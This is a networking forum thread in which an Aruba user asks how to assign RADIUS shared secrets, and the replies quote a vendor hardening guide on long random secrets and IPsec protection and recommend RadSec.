Security

 View Only
  • 1.  RADIUS Keys - best practices

    Posted May 16, 2024 10:51 AM

    Hi, in the past I've always ensured that every switch/mobility controller has a uniquely generated shared key. I know that we can  define our use of shared keys either  unique to a device or  fpr example  have the same shared  key  across a given ip address scope e.g. 192/10

    So does Aruba have a recommended best practice for RADIUS shared ket assignment ... or is it just a case of "you can do these thinjgs .. .take your pick..."

    Rgds

    Alex



  • 2.  RE: RADIUS Keys - best practices

    Posted May 16, 2024 12:12 PM

    From the hardening guide here: https://support.hpe.com/hpesc/public/docDisplay?docId=a00107216en_us

    "RADIUS secrets
    The RADIUS protocol provides a weak form of encryption, which uses the RADIUS shared secret as the basis for the
    encryption key. Ensure that the RADIUS shared secret is as long and as complex as possible ArubaOS supports a
    maximum length of 63 characters. There is no need for this secret to be memorable by a human, so use a service
    such as
    http://www.random.org/ to generate a truly random string.
    An authentication server performing authentication for WPA2 sessions will use the RADIUS protocol to send the
    WPA2 Pairwise Master Key (PMK) to an Aruba mobility controller an attacker intercepting this key would also be
    able to monitor and decrypt Wi-Fi traffic over the air. If the link between the RADIUS server and the Aruba device is
    trusted (e.g., within the same datacenter) then relying on RADIUS encryption is sufficient. However, if the path
    traverses untrusted segments, such as WAN links, RADIUS traffic should be secured inside IPsec tunnels."



    ------------------------------
    Any opinions expressed here are solely my own and not necessarily that of Hewlett Packard Enterprise or Aruba Networks.

    HPE Design and Deploy Guides: https://community.arubanetworks.com/support/migrated-knowledge-base?attachments=&communitykey=dcc83c62-1a3a-4dd8-94dc-92968ea6fff1&pageindex=0&pagesize=12&search=&sort=most_recent&viewtype=card
    ------------------------------



  • 3.  RE: RADIUS Keys - best practices

    Posted May 16, 2024 12:16 PM

    I've seen people go with one global key and I've seen people go with individual keys based on unique device/device type/geography/whim/etc.  Best practice for security is to move to RadSec where the key is no longer the most susceptible portion of the communication.  Short of RadSec, maintain a policy that meets the needs that you feel are important.



    ------------------------------
    Carson Hulcher, ACEX#110
    ------------------------------